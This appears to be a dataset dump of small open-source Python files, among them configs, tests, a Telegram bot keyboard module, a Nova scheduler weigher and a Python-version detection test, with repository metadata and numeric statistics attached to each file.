) | 20.090909 | 55 | 0.552036 | 22 | 221 | 5.409091 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 0.307692 | 221 | 11 | 56 | 20.090909 | 0.75817 | 0 | 0 | 0 | 0 | 0 | 0.27027 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.111111 | 0 | 0.111111 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6ae35abc4a7d4c66d615c6151ad2f2e33c8e4033 | 480 | py | Python | env.py | masanobu48154/ansible_build_wp | 9e5741957cdb1c9d293ea0f7962bc8a4eb2d23c8 | [
"BSD-3-Clause"
] | null | null | null | env.py | masanobu48154/ansible_build_wp | 9e5741957cdb1c9d293ea0f7962bc8a4eb2d23c8 | [
"BSD-3-Clause"
] | null | null | null | env.py | masanobu48154/ansible_build_wp | 9e5741957cdb1c9d293ea0f7962bc8a4eb2d23c8 | [
"BSD-3-Clause"
] | null | null | null | #!user/bin/python
class MyEnv:
"""
"""
def __init__(self):
self.my_env = {
"subnet": "<your_lab_subnet/mask>",
"gateway": "<your_lab_gateway_ip_address>",
"ansible_addr": "<ansible_container_ip_address>",
"web_addr": "<wev_container_ip_address>",
"db_addr": "<db_container_ip_address>",
"phsical_nic": "<NIC name of docker host>",
"db_password": "<mysql_password>"
}
| 30 | 61 | 0.55 | 51 | 480 | 4.666667 | 0.607843 | 0.151261 | 0.226891 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.295833 | 480 | 15 | 62 | 32 | 0.704142 | 0.033333 | 0 | 0 | 0 | 0 | 0.519912 | 0.292035 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0a783bd4b58da85e29e93464a57661225beb40fd | 1,545 | py | Python | keyboards.py | Liubasia/tg-secret-santa-bot | a361fada02c7cdbc88f47485f8ab111f68435344 | [
"MIT"
] | 7 | 2021-11-26T15:39:34.000Z | 2021-12-20T13:20:02.000Z | keyboards.py | Liubasia/tg-secret-santa-bot | a361fada02c7cdbc88f47485f8ab111f68435344 | [
"MIT"
] | 8 | 2021-11-20T23:04:17.000Z | 2022-02-02T11:19:20.000Z | keyboards.py | Liubasia/tg-secret-santa-bot | a361fada02c7cdbc88f47485f8ab111f68435344 | [
"MIT"
] | 2 | 2021-12-01T18:04:40.000Z | 2022-01-16T03:38:18.000Z | from telegram import InlineKeyboardMarkup, InlineKeyboardButton, Message
from emojis import Emoji
from config import config
def secret_santa(chat_id: int, bot_username: str, participants_count: int = 0):
    # knowing the message id is not really needed because a chat can only have one ongoing Secret Santa
deeplink_url = f"https://t.me/{bot_username}?start={chat_id}"
keyboard = [
[InlineKeyboardButton(f"{Emoji.LIST} join", url=deeplink_url)],
[InlineKeyboardButton(f"{Emoji.CROSS} cancel", callback_data=f"cancel")],
]
if participants_count:
unsubscribe_button = InlineKeyboardButton(f"{Emoji.FREEZE} leave", callback_data=f"leave")
keyboard[0].append(unsubscribe_button)
if participants_count >= config.santa.min_participants:
start_button = InlineKeyboardButton(f"{Emoji.SANTA} start match", callback_data=f"match")
keyboard[1].append(start_button)
return InlineKeyboardMarkup(keyboard)
def joined_message(chat_id: int):
return InlineKeyboardMarkup(
[[
InlineKeyboardButton(f"{Emoji.FREEZE} leave", callback_data=f"private:leave:{chat_id}"),
InlineKeyboardButton(f"{Emoji.LIST} update your name", callback_data=f"private:updatename:{chat_id}")
]]
)
def revoke():
    return InlineKeyboardMarkup([[InlineKeyboardButton(f"{Emoji.CROSS} revoke", callback_data="revoke")]])
def new_santa():
return InlineKeyboardMarkup([[InlineKeyboardButton(f"{Emoji.TREE} new Secret Santa", callback_data=f"newsanta")]])
| 36.785714 | 118 | 0.72233 | 183 | 1,545 | 5.95082 | 0.377049 | 0.15427 | 0.191001 | 0.129477 | 0.211203 | 0.091827 | 0.091827 | 0.091827 | 0 | 0 | 0 | 0.002318 | 0.16246 | 1,545 | 41 | 119 | 37.682927 | 0.839258 | 0.062136 | 0 | 0 | 0 | 0 | 0.210235 | 0.03527 | 0 | 0 | 0 | 0 | 0 | 1 | 0.148148 | false | 0 | 0.111111 | 0.111111 | 0.407407 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
0a7b1a96f35172e4fdd90c6e4f154a82c0020afe | 1,350 | py | Python | nova/scheduler/weights/ram.py | lixiaoy1/nova | 357b8b38e88300948bb2e07d1bbaabd1e9d7b60e | [
"Apache-2.0"
] | 2 | 2021-10-11T04:56:25.000Z | 2022-02-16T08:49:29.000Z | nova/scheduler/weights/ram.py | ljzjohnson/nova | 87e1951a1b8c03b9ecdf8f75610d14690b61f272 | [
"Apache-2.0"
] | 132 | 2017-03-27T11:31:52.000Z | 2022-03-30T08:45:02.000Z | nova/scheduler/weights/ram.py | ljzjohnson/nova | 87e1951a1b8c03b9ecdf8f75610d14690b61f272 | [
"Apache-2.0"
] | 8 | 2017-03-27T07:50:38.000Z | 2020-02-14T16:55:56.000Z | # Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
RAM Weigher. Weigh hosts by their RAM usage.
The default is to spread instances across all hosts evenly. If you prefer
stacking, you can set the 'ram_weight_multiplier' option to a negative
number and the weighing has the opposite effect of the default.
"""
import nova.conf
from nova.scheduler import weights
CONF = nova.conf.CONF
class RAMWeigher(weights.BaseHostWeigher):
minval = 0
def weight_multiplier(self):
"""Override the weight multiplier."""
return CONF.filter_scheduler.ram_weight_multiplier
def _weigh_object(self, host_state, weight_properties):
"""Higher weights win. We want spreading to be the default."""
return host_state.free_ram_mb
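A standalone sketch (not nova code; the host names and free-RAM values are hypothetical) of how the multiplier's sign turns spreading into stacking: free RAM is the raw weight, and negating it makes the host with the least free RAM win.

```python
# Hypothetical free RAM per host, in MB.
hosts = {"host-a": 2048, "host-b": 8192}

def best_host(multiplier):
    # The scheduler picks the host with the highest weighted value.
    return max(hosts, key=lambda h: multiplier * hosts[h])

print(best_host(1.0))   # spreading: host with the most free RAM -> host-b
print(best_host(-1.0))  # stacking: host with the least free RAM -> host-a
```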
| 34.615385 | 78 | 0.734815 | 195 | 1,350 | 5.020513 | 0.610256 | 0.061287 | 0.026558 | 0.032686 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008318 | 0.198519 | 1,350 | 38 | 79 | 35.526316 | 0.896488 | 0.70963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.222222 | 0 | 0.888889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0a8328b9a3f6b6cbda1b1ad098e77cbfe813a558 | 682 | py | Python | twisted/lore/test/test_scripts.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 7 | 2015-04-28T13:26:11.000Z | 2020-02-09T17:01:04.000Z | twisted/lore/test/test_scripts.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 4 | 2017-02-19T23:58:13.000Z | 2019-11-01T15:31:22.000Z | twisted/lore/test/test_scripts.py | ioggstream/twisted | 34f9b1e3f097685839000c656332c66ee85be5d8 | [
"Unlicense",
"MIT"
] | 6 | 2017-02-13T09:11:02.000Z | 2021-06-29T11:22:18.000Z | # Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Tests for the command-line interface to lore.
"""
from twisted.trial.unittest import TestCase
from twisted.scripts.test.test_scripts import ScriptTestsMixin
from twisted.python.test.test_shellcomp import ZshScriptTestMixin
class ScriptTests(TestCase, ScriptTestsMixin):
"""
    Tests for lore's scripts.
"""
def test_lore(self):
self.scriptTest("lore/lore")
class ZshIntegrationTestCase(TestCase, ZshScriptTestMixin):
"""
Test that zsh completion functions are generated without error
"""
generateFor = [('lore', 'twisted.lore.scripts.lore.Options')]
| 24.357143 | 66 | 0.73607 | 79 | 682 | 6.316456 | 0.594937 | 0.066132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165689 | 682 | 27 | 67 | 25.259259 | 0.876977 | 0.313783 | 0 | 0 | 0 | 0 | 0.107226 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0a83ff2d5a326326c4c83e273dca2750c377b990 | 505 | py | Python | tests/app/test_encryption.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | null | null | null | tests/app/test_encryption.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | 51 | 2019-07-03T14:11:19.000Z | 2019-07-08T12:24:55.000Z | tests/app/test_encryption.py | cds-snc/notifier-api | 90b385ec49efbaee7e607516fc7d9f08991af813 | [
"MIT"
] | null | null | null | from app.encryption import CryptoSigner
signer = CryptoSigner()
def test_should_sign_content(notify_api):
signer.init_app(notify_api)
assert signer.sign("this") != "this"
def test_should_verify_content(notify_api):
signer.init_app(notify_api)
signed = signer.sign("this")
assert signer.verify(signed) == "this"
def test_should_sign_json(notify_api):
signer.init_app(notify_api)
signed = signer.sign({"this": "that"})
assert signer.verify(signed) == {"this": "that"}
| 24.047619 | 52 | 0.718812 | 68 | 505 | 5.073529 | 0.294118 | 0.156522 | 0.113043 | 0.165217 | 0.588406 | 0.426087 | 0.426087 | 0.426087 | 0.295652 | 0.295652 | 0 | 0 | 0.148515 | 505 | 20 | 53 | 25.25 | 0.802326 | 0 | 0 | 0.230769 | 0 | 0 | 0.063366 | 0 | 0 | 0 | 0 | 0 | 0.230769 | 1 | 0.230769 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a88dbf2d60acbd416ea1b0210d8dbb9c4c7f0c3 | 370 | py | Python | fpipe/utils/meta.py | vkvam/fpipe | 2905095f46923c6c4c460c3d154544b654136df4 | [
"MIT"
] | 18 | 2019-12-16T17:55:57.000Z | 2020-10-21T23:25:40.000Z | fpipe/utils/meta.py | vkvam/fpipe | 2905095f46923c6c4c460c3d154544b654136df4 | [
"MIT"
] | 23 | 2019-12-11T14:15:08.000Z | 2020-02-17T12:53:21.000Z | fpipe/utils/meta.py | vkvam/fpipe | 2905095f46923c6c4c460c3d154544b654136df4 | [
"MIT"
] | null | null | null | from typing import Type
from fpipe.exceptions import FileDataException
from fpipe.file import File
from fpipe.meta.abstract import FileData, T
def meta_prioritized(t: Type[FileData[T]], *sources: File) -> T:
error = FileDataException(t)
for s in sources:
try:
return s[t]
except FileDataException:
pass
raise error
| 23.125 | 64 | 0.675676 | 47 | 370 | 5.297872 | 0.510638 | 0.108434 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.254054 | 370 | 15 | 65 | 24.666667 | 0.902174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.083333 | false | 0.083333 | 0.333333 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 2 |
0a8af313398e9300947e1c20630e8f3c229d4399 | 332 | py | Python | src/experiment.py | Hiestaa/my-tornado-media-library | 6decb97ad02d0ee1613c53dbb1729474e2ea9b42 | [
"MIT"
] | 1 | 2019-09-14T20:46:23.000Z | 2019-09-14T20:46:23.000Z | src/experiment.py | Hiestaa/my-tornado-media-library | 6decb97ad02d0ee1613c53dbb1729474e2ea9b42 | [
"MIT"
] | null | null | null | src/experiment.py | Hiestaa/my-tornado-media-library | 6decb97ad02d0ee1613c53dbb1729474e2ea9b42 | [
"MIT"
] | 1 | 2021-08-24T03:20:46.000Z | 2021-08-24T03:20:46.000Z | import sys
import experiments
from experiments import *
# from experiments import facedetect_facelib
# print (dir(experiments.facedetect_facelib))
if __name__ == '__main__':
if len(sys.argv) > 1:
for name in sys.argv[1:]:
getattr(experiments, name).run()
else:
print("No experiment specified.") | 25.538462 | 45 | 0.680723 | 40 | 332 | 5.4 | 0.55 | 0.138889 | 0.194444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007663 | 0.213855 | 332 | 13 | 46 | 25.538462 | 0.819923 | 0.259036 | 0 | 0 | 0 | 0 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.111111 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
0a9605e2ff3f7c01f3377395f7463b60a8dd6e36 | 499 | py | Python | 35. Search Insert Position/main.py | Competitive-Programmers-Community/LeetCode | 841fdee805b1a626e9f1cd0e12398d25054638af | [
"MIT"
] | 2 | 2019-10-05T09:48:20.000Z | 2019-10-05T15:40:01.000Z | 35. Search Insert Position/main.py | Competitive-Programmers-Community/LeetCode | 841fdee805b1a626e9f1cd0e12398d25054638af | [
"MIT"
] | null | null | null | 35. Search Insert Position/main.py | Competitive-Programmers-Community/LeetCode | 841fdee805b1a626e9f1cd0e12398d25054638af | [
"MIT"
] | 3 | 2020-09-27T05:48:30.000Z | 2021-08-13T10:07:08.000Z | class Solution:
def searchInsert(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
low = 0
high = len(nums) - 1
while low <= high:
mid = (low + high)//2
if nums[mid] == target:
return mid
elif nums[mid] > target:
high = mid - 1
elif nums[mid] < target:
low = mid + 1
return low
| 23.761905 | 41 | 0.398798 | 51 | 499 | 3.901961 | 0.431373 | 0.105528 | 0.19598 | 0.170854 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02 | 0.498998 | 499 | 20 | 42 | 24.95 | 0.776 | 0.102204 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
0a99bfa3122580b534d14c313f5b6c5b6c5b4929 | 517 | py | Python | hyperion/torch/archs/net_arch.py | jsalt2019-diadet/hyperion | 14a11436d62f3c15cd9b1f70bcce3eafbea2f753 | [
"Apache-2.0"
] | 9 | 2019-09-22T05:19:59.000Z | 2022-03-05T18:03:37.000Z | hyperion/torch/archs/net_arch.py | jsalt2019-diadet/hyperion | 14a11436d62f3c15cd9b1f70bcce3eafbea2f753 | [
"Apache-2.0"
] | null | null | null | hyperion/torch/archs/net_arch.py | jsalt2019-diadet/hyperion | 14a11436d62f3c15cd9b1f70bcce3eafbea2f753 | [
"Apache-2.0"
] | 4 | 2019-10-10T06:34:05.000Z | 2022-03-05T18:03:56.000Z | """
Copyright 2019 Johns Hopkins University (Author: Jesus Villalba)
Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from six.moves import xrange
import numpy as np
import torch.nn as nn
class NetArch(nn.Module):
@property
def context(self):
return 0
def get_config(self):
config = {
'class_name': self.__class__.__name__}
return config
| 19.884615 | 66 | 0.702128 | 69 | 517 | 4.913043 | 0.608696 | 0.088496 | 0.141593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 0.216634 | 517 | 25 | 67 | 20.68 | 0.814815 | 0.235977 | 0 | 0 | 0 | 0 | 0.025974 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0.071429 | 0.785714 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0aab5fb09294e4ac352bacfb1b87c2c63ee5dbe5 | 1,597 | py | Python | services/traction/acapy_wrapper/models/input_descriptors.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/acapy_wrapper/models/input_descriptors.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/acapy_wrapper/models/input_descriptors.py | Open-Earth-Foundation/traction | 908b555a7f408a88541b7692d3730e37a297c919 | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | # coding: utf-8
from __future__ import annotations
from datetime import date, datetime # noqa: F401
import re # noqa: F401
from typing import Any, Dict, List, Optional # noqa: F401
from pydantic import AnyUrl, BaseModel, EmailStr, validator # noqa: F401
from acapy_wrapper.models.constraints import Constraints
from acapy_wrapper.models.schemas_input_descriptor_filter import (
SchemasInputDescriptorFilter,
)
def schema_field(string: str) -> str:
if string == "schema":
return "x_schema"
return string
class InputDescriptors(BaseModel):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
InputDescriptors - a model defined in OpenAPI
constraints: The constraints of this InputDescriptors [Optional].
group: The group of this InputDescriptors [Optional].
id: The id of this InputDescriptors [Optional].
metadata: The metadata of this InputDescriptors [Optional].
name: The name of this InputDescriptors [Optional].
purpose: The purpose of this InputDescriptors [Optional].
schema: The schema of this InputDescriptors [Optional].
"""
constraints: Optional[Constraints] = None
group: Optional[List[str]] = None
id: Optional[str] = None
metadata: Optional[Dict[str, Any]] = None
name: Optional[str] = None
purpose: Optional[str] = None
x_schema: Optional[SchemasInputDescriptorFilter] = None
class Config:
alias_generator = schema_field
InputDescriptors.update_forward_refs()
| 31.313725 | 96 | 0.7201 | 186 | 1,597 | 6.096774 | 0.387097 | 0.037037 | 0.135802 | 0.185185 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010204 | 0.202254 | 1,597 | 50 | 97 | 31.94 | 0.879906 | 0.407639 | 0 | 0 | 0 | 0 | 0.015642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.291667 | 0 | 0.791667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
0ab64f30409c1028f80ac4063d29d92dfddf82b9 | 4,140 | py | Python | tests/pyqver_tests.py | cnsnyder/pyqver | d33351804b58752c4d9fef63225e1b8362c1cdaf | [
"Zlib"
] | null | null | null | tests/pyqver_tests.py | cnsnyder/pyqver | d33351804b58752c4d9fef63225e1b8362c1cdaf | [
"Zlib"
] | null | null | null | tests/pyqver_tests.py | cnsnyder/pyqver | d33351804b58752c4d9fef63225e1b8362c1cdaf | [
"Zlib"
] | null | null | null |
# multiple with statement (2, 7(
# from __future__ import with_statement
try:
import argparse
except ImportError, e:
pass
try:
import argparse
except (ImportError, KeyError) as e:
pass
try:
import argparse
except ImportError as e:
pass
finally:
print 'pass'
print "hello world" # 2.0
# nested try/except/finally ok for (2, 0)
try:
try:
pass
except:
pass
finally:
pass
# new style classes
class test(object):
pass # (2, 2)
# yield statement
def yielder():
for x in [1, 2, 3]:
yield 1 # (2.2)
# yes, let's add a fundamental type in a .2
print True # (2, 2)
a = 4
b = 9
c = 8
a = 100 + c // b - 1
# floordiv
print a // b # (2, 2)
a_list = [12.3, 4, 4.0]
# enumerate
enumerate(a_list) # (2, 3)
sum(a_list) # (2, 3)
# comprehension
(x * x for x in range(5)) # (2, 4)
# @classmethod
class C:
@classmethod # (2,4)
def m():
pass
rev = reversed([1, 2, 3, 4]) # (2, 4)
import subprocess
a = subprocess.check_output(['ls'])
x = 0
z = False
y if x else z # (2,5)
# hashlib
import hashlib # (2, 5)
from hashlib import md5 # (2,5)
# ElementTree
import xml.etree.ElementTree # (2,5)
# try/finally # 2.5?
try:
pass
except:
pass
finally:
pass
class cm(object):
def __enter__(self):
pass
def __exit__(self, *args):
pass
# future with statement (2, 5)
with cm():
pass
# ssl in 2.6
import ssl # (2,6)
# WatchedFileHandler added in 2.6
try:
from logging.handlers import WatchedFileHandler
except ImportError:
raise
# new 2.7 modules
try:
# argparse in 2.7
import argparse as not_optparse # (2.7)
# collections.Counter new in 2.7
from collections import Counter
# collections.OrderedDict new in 2.7
from collections import OrderedDict
# NullHandler added in 2.7
from logging import NullHandler
import logging
foo = logging.NullHandler
except ImportError:
pass
# pep 378, ',' format specifier for thousands
foo = '{:20,.2f}'.format(18446744073709551616.0)
bar = '{:20,d}'.format(18446744073709551616)
blip = '{0},{1}'.format('sdfadf', 'sfsdfsdfserer')
# multiple with statement (2, 7(
with cm():
pass
with cm(): # (2, 5)
pass
pass
# some py3+ modules
try:
import faulthandler # (3,3)
import ipaddress # (3,3)
import lzma
import tkinter.ttk
import unittest.mock
import venv
except ImportError as e:
print e
# some py3 functions
try:
import bz2
f = bz2.open('/sdfd')
except Exception as e:
print e
"""
>>> qver('print "hello world"')
(2, 0)
>>> qver('class test(object): pass')
(2, 2)
>>> qver('yield 1')
(2, 2)
>>> qver('a // b')
(2, 2)
>>> qver('True')
(2, 2)
>>> qver('enumerate(a)')
(2, 3)
>>> qver('total = sum')
(2, 0)
>>> qver('sum(a)')
(2, 3)
>>> qver('(x*x for x in range(5))')
(2, 4)
>>> qver('class C:\\n @classmethod\\n def m(): pass')
(2, 4)
>>> qver('y if x else z')
(2, 5)
>>> qver('import hashlib')
(2, 5)
>>> qver('from hashlib import md5')
(2, 5)
>>> qver('import xml.etree.ElementTree')
(2, 5)
>>> qver('try:\\n try: pass;\\n except: pass;\\nfinally: pass')
(2, 0)
>>> qver('try: pass;\\nexcept: pass;\\nfinally: pass')
(2, 5)
>>> qver('from __future__ import with_statement\\nwith x: pass')
(2, 5)
>>> qver('collections.defaultdict(list)')
(2, 5)
>>> qver('from collections import defaultdict')
(2, 5)
>>> qver('"{0}".format(0)')
(2, 6)
>>> qver('memoryview(x)')
(2, 7)
>>> v27('{1, 2, 3}')
(2, 7)
>>> v27('{x for x in s}')
(2, 7)
>>> v27('{x: y for x in s}')
(2, 7)
>>> qver('from __future__ import with_statement\\nwith x:\\n with y: pass')
(2, 5)
>>> v27('from __future__ import with_statement\\nwith x, y: pass')
(2, 7)
>>> qver('@decorator\\ndef f(): pass')
(2, 4)
>>> qver('@decorator\\nclass test:\\n pass')
(2, 6)
#>>> qver('0o0')
#(2, 6)
#>>> qver('@foo\\nclass C: pass')
#(2, 6)
"""
| 17.76824 | 79 | 0.55628 | 598 | 4,140 | 3.795987 | 0.232441 | 0.014097 | 0.021145 | 0.035242 | 0.289868 | 0.226872 | 0.132599 | 0.048458 | 0.014097 | 0 | 0 | 0.073138 | 0.27343 | 4,140 | 232 | 80 | 17.844828 | 0.681516 | 0.167874 | 0 | 0.454545 | 0 | 0 | 0.034726 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.191919 | 0.272727 | null | null | 0.060606 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0ac3bbab22bebebe7a38116d55bf9ab299be07cc | 231 | py | Python | example/config.py | platform-ai/Flask-FileUpload | 77b26729a114a11820f69372dae30590c13f4a69 | [
"MIT"
] | 20 | 2017-04-27T09:11:42.000Z | 2022-01-19T06:38:50.000Z | example/config.py | platform-ai/Flask-FileUpload | 77b26729a114a11820f69372dae30590c13f4a69 | [
"MIT"
] | 9 | 2017-05-07T03:51:55.000Z | 2018-12-01T15:43:09.000Z | example/config.py | platform-ai/Flask-FileUpload | 77b26729a114a11820f69372dae30590c13f4a69 | [
"MIT"
] | 6 | 2017-05-21T13:42:27.000Z | 2022-01-19T06:38:51.000Z | SECRET_KEY = "abc"
FILEUPLOAD_ALLOWED_EXTENSIONS = ["png"]
# FILEUPLOAD_PREFIX = "/cool/upload"
# FILEUPLOAD_LOCALSTORAGE_IMG_FOLDER = "images/boring/"
FILEUPLOAD_RANDOM_FILE_APPENDIX = True
FILEUPLOAD_CONVERT_TO_SNAKE_CASE = True
| 33 | 55 | 0.818182 | 28 | 231 | 6.25 | 0.821429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08658 | 231 | 6 | 56 | 38.5 | 0.829384 | 0.380952 | 0 | 0 | 0 | 0 | 0.042857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |